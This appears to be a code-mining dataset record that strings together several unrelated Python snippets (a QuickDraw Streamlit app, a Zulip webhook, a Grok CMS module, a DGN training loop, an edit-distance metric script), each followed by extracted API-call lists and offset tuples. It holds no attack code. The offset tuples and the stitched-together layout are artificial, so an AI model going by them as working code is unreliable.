    transforms.Normalize((0.9720, 0.9720, 0.9720),
                         (0.1559, 0.1559, 0.1559)) # Normalize with the mean and std of the whole dataset
])
# Dictionary to map id to name of the class
with open('quickdraw/categories/id_to_class.json') as file:
    id_to_class = json.load(file)
if canvas_result.image_data is not None:
    image = canvas_result.image_data
    # Convert RGBA image to RGB (PIL doesn't convert as I want)
    image_rgb = Image.fromarray(np.uint8(image)).convert(mode='P')
    # Expand the single palette channel to 3 channels (H, W, 3).
    image_rgb = np.array(image_rgb)[:, :, np.newaxis]
    image_rgb = np.repeat(image_rgb, repeats=3, axis=2)
    # Use the same transformation used in training and add batch dimension
    image_rgb = torch.unsqueeze(transform(image_rgb), dim=0)
    # Compute logits
    y_lgts = model(image_rgb)
    # Compute scores
    y_prob = F.softmax(y_lgts, dim=1)
    # Compute the top 3 predictions
    top_3 = torch.topk(y_prob, k=3)
    preds = top_3.indices.numpy().flatten()
    probs = top_3.values.detach().numpy().flatten()
    # Map class ids to readable labels and pair them with their scores.
    labels = [id_to_class[str(i)] for i in preds]
    predictions = dict(zip(labels, probs))
    st.write('**Top 3 predictions:**')
    st.write(predictions)
|
[
"streamlit.sidebar.slider",
"streamlit_drawable_canvas.st_canvas",
"json.load",
"torch.topk",
"numpy.uint8",
"streamlit.sidebar.checkbox",
"streamlit.write",
"torch.nn.functional.softmax",
"torchvision.transforms.ToTensor",
"streamlit.sidebar.selectbox",
"numpy.array",
"torch.device",
"torchvision.transforms.Normalize",
"numpy.repeat"
] |
[((275, 351), 'streamlit.sidebar.slider', 'st.sidebar.slider', ([], {'label': '"""Stroke width:"""', 'min_value': '(1)', 'max_value': '(25)', 'value': '(3)'}), "(label='Stroke width:', min_value=1, max_value=25, value=3)\n", (292, 351), True, 'import streamlit as st\n'), ((387, 495), 'streamlit.sidebar.selectbox', 'st.sidebar.selectbox', ([], {'label': '"""Drawing tool:"""', 'options': "('freedraw', 'line', 'rect', 'circle', 'transform')"}), "(label='Drawing tool:', options=('freedraw', 'line',\n 'rect', 'circle', 'transform'))\n", (407, 495), True, 'import streamlit as st\n'), ((521, 580), 'streamlit.sidebar.checkbox', 'st.sidebar.checkbox', ([], {'label': '"""Update in realtime"""', 'value': '(True)'}), "(label='Update in realtime', value=True)\n", (540, 580), True, 'import streamlit as st\n'), ((637, 803), 'streamlit_drawable_canvas.st_canvas', 'st_canvas', ([], {'stroke_width': 'stroke_width', 'stroke_color': '"""black"""', 'update_streamlit': 'realtime_update', 'height': '(400)', 'width': '(400)', 'drawing_mode': 'drawing_mode', 'key': '"""canvas"""'}), "(stroke_width=stroke_width, stroke_color='black', update_streamlit\n =realtime_update, height=400, width=400, drawing_mode=drawing_mode, key\n ='canvas')\n", (646, 803), False, 'from streamlit_drawable_canvas import st_canvas\n'), ((1362, 1377), 'json.load', 'json.load', (['file'], {}), '(file)\n', (1371, 1377), False, 'import json\n'), ((1663, 1702), 'numpy.repeat', 'np.repeat', (['image_rgb'], {'repeats': '(3)', 'axis': '(2)'}), '(image_rgb, repeats=3, axis=2)\n', (1672, 1702), True, 'import numpy as np\n'), ((1925, 1949), 'torch.nn.functional.softmax', 'F.softmax', (['y_lgts'], {'dim': '(1)'}), '(y_lgts, dim=1)\n', (1934, 1949), True, 'import torch.nn.functional as F\n'), ((1998, 2021), 'torch.topk', 'torch.topk', (['y_prob'], {'k': '(3)'}), '(y_prob, k=3)\n', (2008, 2021), False, 'import torch\n'), ((2225, 2259), 'streamlit.write', 'st.write', (['"""**Top 3 predictions:**"""'], {}), "('**Top 3 
predictions:**')\n", (2233, 2259), True, 'import streamlit as st\n'), ((2264, 2285), 'streamlit.write', 'st.write', (['predictions'], {}), '(predictions)\n', (2272, 2285), True, 'import streamlit as st\n'), ((1046, 1067), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (1065, 1067), True, 'import torchvision.transforms as transforms\n'), ((1078, 1147), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['(0.972, 0.972, 0.972)', '(0.1559, 0.1559, 0.1559)'], {}), '((0.972, 0.972, 0.972), (0.1559, 0.1559, 0.1559))\n', (1098, 1147), True, 'import torchvision.transforms as transforms\n'), ((1609, 1628), 'numpy.array', 'np.array', (['image_rgb'], {}), '(image_rgb)\n', (1617, 1628), True, 'import numpy as np\n'), ((938, 957), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (950, 957), False, 'import torch\n'), ((1558, 1573), 'numpy.uint8', 'np.uint8', (['image'], {}), '(image)\n', (1566, 1573), True, 'import numpy as np\n')]
|
import numpy as np
def float_ndarray_to_dict(arr):
    """Serialize a float ndarray to a JSON-friendly dict (see np_arr_to_dict)."""
    return np_arr_to_dict(arr)
def dict_to_float_ndarray(string):
    """Inverse of float_ndarray_to_dict: rebuild the ndarray from its dict.

    NOTE(review): despite its name, the `string` parameter is the dict
    produced by np_arr_to_dict, not a text value.
    """
    return dict_to_np_arr(string)
def identity(e):
    """Pass-through (de)serializer: return the value unchanged."""
    return e
def float_to_string(num):
    """Render a numeric value as its default text representation."""
    return f"{num}"
def string_to_float(string):
    """Parse decimal text into a float (raises ValueError on bad input)."""
    parsed = float(string)
    return parsed
def np_arr_to_dict(arr):
    """Encode a NumPy array as a JSON-serializable dict.

    The dict carries the nested-list data ('arr'), the shape as a list
    ('shape') and the dtype name ('dtype') — exactly the fields that
    dict_to_np_arr expects back.
    """
    return dict(arr=arr.tolist(),
                shape=list(arr.shape),
                dtype=str(arr.dtype))
def dict_to_np_arr(data):
    """Rebuild a NumPy array from the dict produced by np_arr_to_dict."""
    target_shape = tuple(data['shape'])
    return np.array(data['arr'], dtype=data['dtype']).reshape(target_shape)
|
[
"numpy.array"
] |
[((519, 545), 'numpy.array', 'np.array', (['arr'], {'dtype': 'dtype'}), '(arr, dtype=dtype)\n', (527, 545), True, 'import numpy as np\n')]
|
from typing import Any, Dict, Optional
from django.http import HttpRequest, HttpResponse
from django.utils.translation import ugettext as _
from zerver.decorator import api_key_only_webhook_view
from zerver.lib.request import REQ, has_request_variables
from zerver.lib.response import json_error, json_success
from zerver.lib.webhooks.common import check_send_webhook_message
from zerver.models import UserProfile
BODY_TEMPLATE = '[{website_name}]({website_url}) has {user_num} visitors online.'
@api_key_only_webhook_view('GoSquared')
@has_request_variables
def api_gosquared_webhook(request: HttpRequest, user_profile: UserProfile,
                          payload: Dict[str, Dict[str, Any]]=REQ(argument_type='body')) -> HttpResponse:
    """Forward a GoSquared live-visitor notification into Zulip.

    The payload carries the monitored site's details and the number of
    concurrent visitors; both are rendered through BODY_TEMPLATE.
    """
    site_details = payload['siteDetails']
    account_link = 'https://www.gosquared.com/now/' + site_details['acct']
    message_body = BODY_TEMPLATE.format(
        website_name=site_details['domain'],
        website_url=account_link,
        user_num=payload['concurrents'],
    )
    message_topic = 'GoSquared - {website_name}'.format(website_name=site_details['domain'])
    check_send_webhook_message(request, user_profile, message_topic, message_body)
    return json_success()
|
[
"zerver.lib.response.json_success",
"zerver.lib.webhooks.common.check_send_webhook_message",
"zerver.decorator.api_key_only_webhook_view",
"zerver.lib.request.REQ"
] |
[((501, 539), 'zerver.decorator.api_key_only_webhook_view', 'api_key_only_webhook_view', (['"""GoSquared"""'], {}), "('GoSquared')\n", (526, 539), False, 'from zerver.decorator import api_key_only_webhook_view\n'), ((699, 724), 'zerver.lib.request.REQ', 'REQ', ([], {'argument_type': '"""body"""'}), "(argument_type='body')\n", (702, 724), False, 'from zerver.lib.request import REQ, has_request_variables\n'), ((1113, 1175), 'zerver.lib.webhooks.common.check_send_webhook_message', 'check_send_webhook_message', (['request', 'user_profile', 'topic', 'body'], {}), '(request, user_profile, topic, body)\n', (1139, 1175), False, 'from zerver.lib.webhooks.common import check_send_webhook_message\n'), ((1187, 1201), 'zerver.lib.response.json_success', 'json_success', ([], {}), '()\n', (1199, 1201), False, 'from zerver.lib.response import json_error, json_success\n')]
|
import z3c.baseregistry.baseregistry
import asm.cms.page
import grok
import zope.component
import zope.interface
import zope.publisher.browser
import zope.publisher.interfaces.browser
import zope.intid.interfaces
class CMS(grok.Application, asm.cms.page.Page):
    """Application root: a grok application that is itself a CMS page."""
    zope.interface.implements(asm.cms.interfaces.ICMS)
    # Keep this here to support old instances.
    type = 'htmlpage'
    def __init__(self, type='htmlpage'):
        # Forward the edition type to the Page base class constructor.
        super(CMS, self).__init__(type)
@grok.subscribe(zope.intid.interfaces.IIntIds, grok.IObjectAddedEvent)
def cleanup_initial_edition(obj, event):
    """Register the CMS and its editions with a freshly added intid utility."""
    # This is a work-around for an ordering problem: eventually the initial
    # editions are created before the intid utility is registered. This cleans
    # up that mess and registers all editions that exist in the CMS directly.
    cms = obj.__parent__.__parent__
    # Only act when the utility lives inside a CMS site.
    if not asm.cms.interfaces.ICMS.providedBy(cms):
        return
    for edition in cms.values():
        obj.register(edition)
    obj.register(cms)
class CMSProfile(grok.Adapter):
    """Expose the selected profile of a CMS as a read/write `name` property.

    The active profile is kept as an extra base of the site manager;
    switching profiles swaps that base while leaving the others intact.
    """
    grok.context(CMS)
    grok.provides(asm.cms.interfaces.IProfileSelection)
    def set_name(self, value):
        # Resolve the profile utility registered under this name.
        value = zope.component.getUtility(asm.cms.interfaces.IProfile,
                                          name=value)
        sm = self.context.getSiteManager()
        # Strip any previously selected profile from the bases, then
        # install the new one at the front.
        bases = (x for x in sm.__bases__
                 if not asm.cms.interfaces.IProfile.providedBy(x))
        sm.__bases__ = (value,) + tuple(bases)
    def get_name(self):
        sm = self.context.getSiteManager()
        # Find the profile among the site manager's bases (if any).
        for profile in sm.__bases__:
            if not asm.cms.interfaces.IProfile.providedBy(profile):
                continue
            break
        else:
            # No profile is currently selected.
            return None
        # Map the profile object back to its registered utility name.
        for name, reg_profile in zope.component.getUtilitiesFor(
            asm.cms.interfaces.IProfile):
            if reg_profile is profile:
                return name
    name = property(fget=get_name, fset=set_name)
class Profile(z3c.baseregistry.baseregistry.BaseComponents):
    """A named base registry representing one selectable CMS profile."""
    zope.interface.implements(asm.cms.interfaces.IProfile)
    def __init__(self, name):
        # Profiles always hang off the global site manager.
        super(Profile, self).__init__(zope.component.globalSiteManager, name)
|
[
"grok.context",
"grok.provides",
"grok.subscribe"
] |
[((474, 543), 'grok.subscribe', 'grok.subscribe', (['zope.intid.interfaces.IIntIds', 'grok.IObjectAddedEvent'], {}), '(zope.intid.interfaces.IIntIds, grok.IObjectAddedEvent)\n', (488, 543), False, 'import grok\n'), ((1044, 1061), 'grok.context', 'grok.context', (['CMS'], {}), '(CMS)\n', (1056, 1061), False, 'import grok\n'), ((1066, 1117), 'grok.provides', 'grok.provides', (['asm.cms.interfaces.IProfileSelection'], {}), '(asm.cms.interfaces.IProfileSelection)\n', (1079, 1117), False, 'import grok\n')]
|
#!/usr/bin/env python
"""
Merges the intermediate localization files into a single
localization file.
Hazen 08/17
"""
import glob
import os
from xml.etree import ElementTree
import storm_analysis.sa_library.readinsight3 as readinsight3
import storm_analysis.sa_library.writeinsight3 as writeinsight3
def mergeAnalysis(dir_name, bin_base_name, extensions = (".bin",)):
    """
    Merge per-job intermediate localization files into single output files.

    dir_name - Working directory containing the job*.xml files and the
               corresponding p_<n>_mlist* localization files.
    bin_base_name - Base name (without extension) of the merged output.
    extensions - Localization file extensions to merge, one output file per
                 extension.  (Immutable default instead of a mutable list;
                 callers may still pass a list.)

    Raises RuntimeError if any job's localization file is missing or not
    finished; partial outputs are deleted in that case.
    """
    # Create Insight3 file writers, one per extension.
    i3_out = []
    for ext in extensions:
        i3_out.append(writeinsight3.I3Writer(bin_base_name + ext))

    # Find all the job*.xml files.
    job_xml_files = glob.glob(dir_name + "job*.xml")

    # Sort job files by the numeric index embedded in "job_<n>.xml".
    job_xml_files = sorted(job_xml_files, key = lambda x: int(os.path.splitext(os.path.basename(x))[0].split("_")[1]))

    # Check for corresponding mlist.bin files.
    metadata = None
    last_frame = 0
    for i in range(len(job_xml_files)):
        job_complete = True
        for j, ext in enumerate(extensions):
            mlist_name = dir_name + "p_" + str(i+1) + "_mlist" + ext
            if os.path.exists(mlist_name) and readinsight3.checkStatus(mlist_name):

                # Load metadata from the first file.
                if (i == 0) and (j == 0):
                    metadata = readinsight3.loadI3Metadata(mlist_name)

                # Read localizations.
                i3_data = readinsight3.loadI3File(mlist_name, verbose = False)

                # Check for empty file.
                if (i3_data.size == 0):
                    print("No localizations found in", mlist_name)
                else:
                    # Print frame range covered.
                    if (j == 0):
                        last_frame = i3_data["fr"][-1]
                        print(i3_data["fr"][0], last_frame, mlist_name)

                    # Add localizations to the output file.
                    i3_out[j].addMolecules(i3_data)
            else:
                job_complete = False
                break

        if not job_complete:
            # Abort the merge and delete the partial outputs so a broken
            # merge cannot be mistaken for a finished one.
            print("Merge failed because", job_xml_files[i], "is incomplete.")
            for j, ext in enumerate(extensions):
                i3_out[j].close()
                os.remove(bin_base_name + ext)
            # Raise instead of 'assert False' so this also fires when
            # Python is run with -O (asserts are stripped then).
            raise RuntimeError("Merge failed, " + job_xml_files[i] + " is incomplete.")

    if metadata is None:
        print("No metadata found.")
        for i3w in i3_out:
            i3w.close()
    else:
        # Fix movie length node based on the last frame of the last molecule.
        metadata.find("movie").find("movie_l").text = str(last_frame)

        # Also need to fix analysis end points. We are assuming that the
        # entire movie was analyzed.
        metadata.find("settings").find("start_frame").text = "-1"
        metadata.find("settings").find("max_frame").text = "-1"

        for i3w in i3_out:
            i3w.closeWithMetadata(ElementTree.tostring(metadata, 'ISO-8859-1'))
if (__name__ == "__main__"):

    import argparse

    # Command line interface for merging parallel analysis results.
    parser = argparse.ArgumentParser(description = 'Merge analysis results from parallel analysis.')

    parser.add_argument('--working_dir', dest='wdir', type=str, required=True,
                        help = "The name of the analysis working directory.")
    parser.add_argument('--bin_base_name', dest='merged', type=str, required=True,
                        help = "The base name of the merged localization file (i.e. without .bin extension)")
    parser.add_argument('--ext', dest='ext', type=str, required=False, default=[".bin"], nargs = "*",
                        help = "The name of the extensions, if any.")

    args = parser.parse_args()

    mergeAnalysis(args.wdir, args.merged, args.ext)
|
[
"storm_analysis.sa_library.readinsight3.checkStatus",
"os.remove",
"argparse.ArgumentParser",
"os.path.basename",
"storm_analysis.sa_library.writeinsight3.I3Writer",
"os.path.exists",
"storm_analysis.sa_library.readinsight3.loadI3File",
"glob.glob",
"storm_analysis.sa_library.readinsight3.loadI3Metadata",
"xml.etree.ElementTree.tostring"
] |
[((575, 607), 'glob.glob', 'glob.glob', (["(dir_name + 'job*.xml')"], {}), "(dir_name + 'job*.xml')\n", (584, 607), False, 'import glob\n'), ((2913, 3003), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Merge analysis results from parallel analysis."""'}), "(description=\n 'Merge analysis results from parallel analysis.')\n", (2936, 3003), False, 'import argparse\n'), ((474, 517), 'storm_analysis.sa_library.writeinsight3.I3Writer', 'writeinsight3.I3Writer', (['(bin_base_name + ext)'], {}), '(bin_base_name + ext)\n', (496, 517), True, 'import storm_analysis.sa_library.writeinsight3 as writeinsight3\n'), ((1036, 1062), 'os.path.exists', 'os.path.exists', (['mlist_name'], {}), '(mlist_name)\n', (1050, 1062), False, 'import os\n'), ((1067, 1103), 'storm_analysis.sa_library.readinsight3.checkStatus', 'readinsight3.checkStatus', (['mlist_name'], {}), '(mlist_name)\n', (1091, 1103), True, 'import storm_analysis.sa_library.readinsight3 as readinsight3\n'), ((1337, 1387), 'storm_analysis.sa_library.readinsight3.loadI3File', 'readinsight3.loadI3File', (['mlist_name'], {'verbose': '(False)'}), '(mlist_name, verbose=False)\n', (1360, 1387), True, 'import storm_analysis.sa_library.readinsight3 as readinsight3\n'), ((2169, 2199), 'os.remove', 'os.remove', (['(bin_base_name + ext)'], {}), '(bin_base_name + ext)\n', (2178, 2199), False, 'import os\n'), ((2801, 2845), 'xml.etree.ElementTree.tostring', 'ElementTree.tostring', (['metadata', '"""ISO-8859-1"""'], {}), "(metadata, 'ISO-8859-1')\n", (2821, 2845), False, 'from xml.etree import ElementTree\n'), ((1232, 1271), 'storm_analysis.sa_library.readinsight3.loadI3Metadata', 'readinsight3.loadI3Metadata', (['mlist_name'], {}), '(mlist_name)\n', (1259, 1271), True, 'import storm_analysis.sa_library.readinsight3 as readinsight3\n'), ((710, 729), 'os.path.basename', 'os.path.basename', (['x'], {}), '(x)\n', (726, 729), False, 'import os\n')]
|
import logging

# Root logger at INFO level so handler invocations show up in the runtime's
# log output (e.g. CloudWatch for AWS Lambda).
logger = logging.getLogger()
logger.setLevel(logging.INFO)


def handler(event, context):
    """Lambda-style entry point: log a greeting; the result is unused."""
    logger.info("Hello World!")
    return None
|
[
"logging.getLogger"
] |
[((25, 44), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (42, 44), False, 'import logging\n')]
|
from quickdraw import QuickDrawDataGroup
from tqdm import tqdm
import os
def main():
    """
    Download the Quick, Draw! images and create the directories that hold them.

    Notes
    -----
    - See https://pytorch.org/vision/stable/datasets.html#torchvision.datasets.ImageFolder to see
      how images must be arranged for the Dataset.
    """
    # Root output directory; one sub-directory per category is added below.
    if not os.path.exists('images'):
        os.mkdir('images')

    # One category name per line; drop the trailing newlines.
    with open('categories/categories.txt') as file:
        names = [line.replace('\n', '') for line in file.readlines()]

    for name in tqdm(names):
        # Fetch up to 1000 recognized drawings per category, caching the raw
        # .bin data locally.
        group = QuickDrawDataGroup(
            name,
            recognized=True,
            max_drawings=1000,
            cache_dir='bin-images',
            print_messages=False
        )
        # Directory names use '-' instead of spaces.
        safe_name = name.replace(' ', '-')
        class_dir = f'images/{safe_name}/'
        if not os.path.exists(class_dir):
            os.mkdir(class_dir)
        for drawing in group.drawings:
            drawing.image.save(f'images/{safe_name}/{drawing.key_id}.jpg')
# Run the download only when executed as a script.
if __name__ == '__main__':
    main()
|
[
"os.mkdir",
"tqdm.tqdm",
"os.path.exists",
"quickdraw.QuickDrawDataGroup"
] |
[((552, 563), 'tqdm.tqdm', 'tqdm', (['names'], {}), '(names)\n', (556, 563), False, 'from tqdm import tqdm\n'), ((359, 383), 'os.path.exists', 'os.path.exists', (['"""images"""'], {}), "('images')\n", (373, 383), False, 'import os\n'), ((393, 411), 'os.mkdir', 'os.mkdir', (['"""images"""'], {}), "('images')\n", (401, 411), False, 'import os\n'), ((582, 693), 'quickdraw.QuickDrawDataGroup', 'QuickDrawDataGroup', (['name'], {'recognized': '(True)', 'max_drawings': '(1000)', 'cache_dir': '"""bin-images"""', 'print_messages': '(False)'}), "(name, recognized=True, max_drawings=1000, cache_dir=\n 'bin-images', print_messages=False)\n", (600, 693), False, 'from quickdraw import QuickDrawDataGroup\n'), ((849, 869), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (863, 869), False, 'import os\n'), ((883, 897), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (891, 897), False, 'import os\n')]
|
import math, random, copy
import numpy as np
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
import torch
import torch.nn as nn
import torch.optim as optim
import torch.autograd as autograd
import torch.nn.functional as F
from DGN import DGN
from buffer import ReplayBuffer
from surviving import Surviving
from config import *

# NOTE: hyper-parameters and loop state (capacity, hidden_dim, batch_size,
# max_step, n_episode, n_epoch, GAMMA, epsilon, i_episode, score, ...) come
# from `from config import *` above.
USE_CUDA = torch.cuda.is_available()

env = Surviving(n_agent = 100)
n_ant = env.n_agent
observation_space = env.len_obs
n_actions = env.n_action

buff = ReplayBuffer(capacity)
# Online Q-network and its target copy (synced every 5 episodes below).
model = DGN(n_ant,observation_space,hidden_dim,n_actions)
model_tar = DGN(n_ant,observation_space,hidden_dim,n_actions)
model = model.cuda()
model_tar = model_tar.cuda()
optimizer = optim.Adam(model.parameters(), lr = 0.0001)

# Pre-allocated minibatch buffers: observations, adjacency matrices, and
# their next-step counterparts.
O = np.ones((batch_size,n_ant,observation_space))
Next_O = np.ones((batch_size,n_ant,observation_space))
Matrix = np.ones((batch_size,n_ant,n_ant))
Next_Matrix = np.ones((batch_size,n_ant,n_ant))

# Score log file; one (score/2000) entry every 20 episodes.
f = open('r.txt','w')
while i_episode<n_episode:

	# Linearly decay epsilon-greedy exploration after the warm-up
	# episodes, with a floor of 0.1.
	if i_episode > 100:
		epsilon -= 0.0004
		if epsilon < 0.1:
			epsilon = 0.1
	i_episode+=1
	steps = 0
	obs, adj = env.reset()
	while steps < max_step:
		steps+=1
		action=[]
		# Q-values for all agents given observations and the adjacency graph.
		q = model(torch.Tensor(np.array([obs])).cuda(), torch.Tensor(adj).cuda())[0]
		for i in range(n_ant):
			# Epsilon-greedy action selection per agent.
			if np.random.rand() < epsilon:
				a = np.random.randint(n_actions)
			else:
				a = q[i].argmax().item()
			action.append(a)

		next_obs, next_adj, reward, terminated = env.step(action)

		buff.add(np.array(obs),action,reward,np.array(next_obs),adj,next_adj,terminated)
		obs = next_obs
		adj = next_adj
		score += sum(reward)

	# Log the normalized score every 20 episodes, then reset it.
	if i_episode%20==0:
		print(score/2000)
		f.write(str(score/2000)+'\n')
		score = 0

	# No training during the first 100 (buffer-filling) episodes.
	if i_episode < 100:
		continue

	for e in range(n_epoch):

		# Assemble a minibatch from the replay buffer.
		batch = buff.getBatch(batch_size)
		for j in range(batch_size):
			sample = batch[j]
			O[j] = sample[0]
			Next_O[j] = sample[3]
			Matrix[j] = sample[4]
			Next_Matrix[j] = sample[5]

		q_values = model(torch.Tensor(O).cuda(), torch.Tensor(Matrix).cuda())
		# Bootstrap target: per-agent max over actions from the target net.
		target_q_values = model_tar(torch.Tensor(Next_O).cuda(), torch.Tensor(Next_Matrix).cuda()).max(dim = 2)[0]
		target_q_values = np.array(target_q_values.cpu().data)
		expected_q = np.array(q_values.cpu().data)

		# One-step TD target for the action actually taken; (1 - terminated)
		# zeroes the bootstrap term at episode end.
		for j in range(batch_size):
			sample = batch[j]
			for i in range(n_ant):
				expected_q[j][i][sample[1][i]] = sample[2][i] + (1-sample[6])*GAMMA*target_q_values[j][i]

		# Mean squared TD error over the whole minibatch.
		loss = (q_values - torch.Tensor(expected_q).cuda()).pow(2).mean()
		optimizer.zero_grad()
		loss.backward()
		optimizer.step()

	# Periodically sync the target network with the online network.
	if i_episode%5 == 0:
		model_tar.load_state_dict(model.state_dict())
|
[
"surviving.Surviving",
"numpy.ones",
"DGN.DGN",
"numpy.random.randint",
"torch.cuda.is_available",
"numpy.array",
"torch.Tensor",
"numpy.random.rand",
"buffer.ReplayBuffer"
] |
[((346, 371), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (369, 371), False, 'import torch\n'), ((379, 401), 'surviving.Surviving', 'Surviving', ([], {'n_agent': '(100)'}), '(n_agent=100)\n', (388, 401), False, 'from surviving import Surviving\n'), ((489, 511), 'buffer.ReplayBuffer', 'ReplayBuffer', (['capacity'], {}), '(capacity)\n', (501, 511), False, 'from buffer import ReplayBuffer\n'), ((520, 572), 'DGN.DGN', 'DGN', (['n_ant', 'observation_space', 'hidden_dim', 'n_actions'], {}), '(n_ant, observation_space, hidden_dim, n_actions)\n', (523, 572), False, 'from DGN import DGN\n'), ((582, 634), 'DGN.DGN', 'DGN', (['n_ant', 'observation_space', 'hidden_dim', 'n_actions'], {}), '(n_ant, observation_space, hidden_dim, n_actions)\n', (585, 634), False, 'from DGN import DGN\n'), ((743, 790), 'numpy.ones', 'np.ones', (['(batch_size, n_ant, observation_space)'], {}), '((batch_size, n_ant, observation_space))\n', (750, 790), True, 'import numpy as np\n'), ((798, 845), 'numpy.ones', 'np.ones', (['(batch_size, n_ant, observation_space)'], {}), '((batch_size, n_ant, observation_space))\n', (805, 845), True, 'import numpy as np\n'), ((853, 888), 'numpy.ones', 'np.ones', (['(batch_size, n_ant, n_ant)'], {}), '((batch_size, n_ant, n_ant))\n', (860, 888), True, 'import numpy as np\n'), ((901, 936), 'numpy.ones', 'np.ones', (['(batch_size, n_ant, n_ant)'], {}), '((batch_size, n_ant, n_ant))\n', (908, 936), True, 'import numpy as np\n'), ((1469, 1482), 'numpy.array', 'np.array', (['obs'], {}), '(obs)\n', (1477, 1482), True, 'import numpy as np\n'), ((1497, 1515), 'numpy.array', 'np.array', (['next_obs'], {}), '(next_obs)\n', (1505, 1515), True, 'import numpy as np\n'), ((1273, 1289), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (1287, 1289), True, 'import numpy as np\n'), ((1309, 1337), 'numpy.random.randint', 'np.random.randint', (['n_actions'], {}), '(n_actions)\n', (1326, 1337), True, 'import numpy as np\n'), ((1954, 1969), 
'torch.Tensor', 'torch.Tensor', (['O'], {}), '(O)\n', (1966, 1969), False, 'import torch\n'), ((1978, 1998), 'torch.Tensor', 'torch.Tensor', (['Matrix'], {}), '(Matrix)\n', (1990, 1998), False, 'import torch\n'), ((1213, 1230), 'torch.Tensor', 'torch.Tensor', (['adj'], {}), '(adj)\n', (1225, 1230), False, 'import torch\n'), ((1188, 1203), 'numpy.array', 'np.array', (['[obs]'], {}), '([obs])\n', (1196, 1203), True, 'import numpy as np\n'), ((2037, 2057), 'torch.Tensor', 'torch.Tensor', (['Next_O'], {}), '(Next_O)\n', (2049, 2057), False, 'import torch\n'), ((2066, 2091), 'torch.Tensor', 'torch.Tensor', (['Next_Matrix'], {}), '(Next_Matrix)\n', (2078, 2091), False, 'import torch\n'), ((2416, 2440), 'torch.Tensor', 'torch.Tensor', (['expected_q'], {}), '(expected_q)\n', (2428, 2440), False, 'import torch\n')]
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
from __future__ import unicode_literals # at top of module
import argparse
import logging
import sys
# Configure the root logger once at import time; messages show the level,
# source file and line number of the call site.
logging.basicConfig(
    format='%(levelname)s(%(filename)s:%(lineno)d): %(message)s')
def levenshtein(u, v):
    """Compute the Levenshtein distance between sequences u and v.

    Returns a tuple ``(distance, (substitutions, deletions, insertions))``
    describing one optimal edit script.  Ties are broken in the order
    substitution, deletion, insertion (same as the original table fill).
    """
    n_cols = len(v) + 1
    # DP cost row plus a parallel row of (SUB, DEL, INS) counters.
    row = list(range(n_cols))
    ops_row = [(0, 0, j) for j in range(n_cols)]
    for i in range(1, len(u) + 1):
        prev_row, row = row, [i] + [None] * len(v)
        prev_ops_row, ops_row = ops_row, [(0, i, 0)] + [None] * len(v)
        for j in range(1, n_cols):
            cost_del = prev_row[j] + 1
            cost_ins = row[j - 1] + 1
            diff = int(u[i - 1] != v[j - 1])
            cost_sub = prev_row[j - 1] + diff
            best = min(cost_sub, cost_del, cost_ins)
            row[j] = best
            if best == cost_sub:
                n_s, n_d, n_i = prev_ops_row[j - 1]
                ops_row[j] = (n_s + diff, n_d, n_i)
            elif best == cost_del:
                n_s, n_d, n_i = prev_ops_row[j]
                ops_row[j] = (n_s, n_d + 1, n_i)
            else:
                n_s, n_d, n_i = ops_row[j - 1]
                ops_row[j] = (n_s, n_d, n_i + 1)
    return row[-1], ops_row[-1]
def load_file(fname, encoding):
    """Read *fname* and return its lines decoded with *encoding*.

    Trailing ``\\n`` and ``\\r`` characters are stripped from each line.
    On an I/O or decoding error the problem is logged and the process
    exits with status 1 (preserving the original CLI behaviour).
    """
    import io  # local import; io.open works on both Python 2 and 3
    try:
        # io.open decodes transparently, replacing the Python-2-only
        # str.decode() call; newline='\n' matches the original behaviour of
        # splitting lines on '\n' only.  The context manager guarantees the
        # handle is closed even on error (the original leaked it).
        with io.open(fname, 'r', encoding=encoding, newline='\n') as f:
            return [line.rstrip('\n').rstrip('\r') for line in f]
    except (IOError, OSError, UnicodeDecodeError):
        # Narrowed from a bare `except:` that silently swallowed everything
        # (including KeyboardInterrupt).
        logging.error('Error reading file "%s"', fname)
        exit(1)
def get_unicode_code(text):
    """Return *text* with every non-ASCII character replaced by a
    ``\\u``-prefixed lowercase hexadecimal code-point escape."""
    pieces = []
    for ch in text:
        code_point = ord(ch)
        if code_point < 128:
            pieces.append(ch)
        else:
            pieces.append('\\u' + format(code_point, 'x'))
    return ''.join(pieces)
def measure(transcription=None, reference=None, input_source='str', separator='\t', encoding='utf-8'):
    '''
    Compute and print character (CER), word (WER) and sentence (SER)
    error rates between reference and transcription sentences.

    input_source selects where the sentences come from:
      'str'  -- `reference` and `transcription` are single sentences;
      'file' -- they name two parallel files, one sentence per line;
      '-'    -- pairs "reference<separator>transcription" come from stdin.
    Exits the process with status 1 on usage errors.

    NOTE(review): lines read from stdin are passed through .decode(encoding),
    which is Python-2 behaviour (str has no .decode in Python 3) -- confirm
    the intended interpreter before reuse.

    Original argparse-based CLI definition, kept for reference:

    parser = argparse.ArgumentParser(
        description='Compute useful evaluation metrics (CER, WER, SER, ...)')
    parser.add_argument(
        '-r', '--reference', type=str, metavar='REF', default=None,
        help='reference sentence or file')
    parser.add_argument(
        '-t', '--transcription', type=str, metavar='HYP', default=None,
        help='transcription sentence or file')
    parser.add_argument(
        '-i', '--input_source', type=str, choices=('-', 'str', 'file'),
        default='-', help=""""-" reads parallel sentences from the standard
        input, "str" interprets `-r' and `-t' as sentences, and "file"
        interprets `-r' and `-t' as two parallel files, with one sentence per
        line (default: -)""")
    parser.add_argument(
        '-s', '--separator', type=str, metavar='SEP', default='\t',
        help="""use this string to separate the reference and transcription
        when reading from the standard input (default: \\t)""")
    parser.add_argument(
        '-e', '--encoding', type=str, metavar='ENC', default='utf-8',
        help="""character encoding of the reference and transcription text
        (default: utf-8)""")
    args = parser.parse_args()
    '''
    # 'str' and 'file' modes need both inputs up front; '-' reads stdin.
    if input_source != '-' and \
            (reference is None or transcription is None):
        logging.error('Expected reference and transcription sources')
        exit(1)
    ref, hyp = [], []
    if input_source == 'str':
        ref.append(reference)
        hyp.append(transcription)
        # ref.append(get_unicode_code(reference))
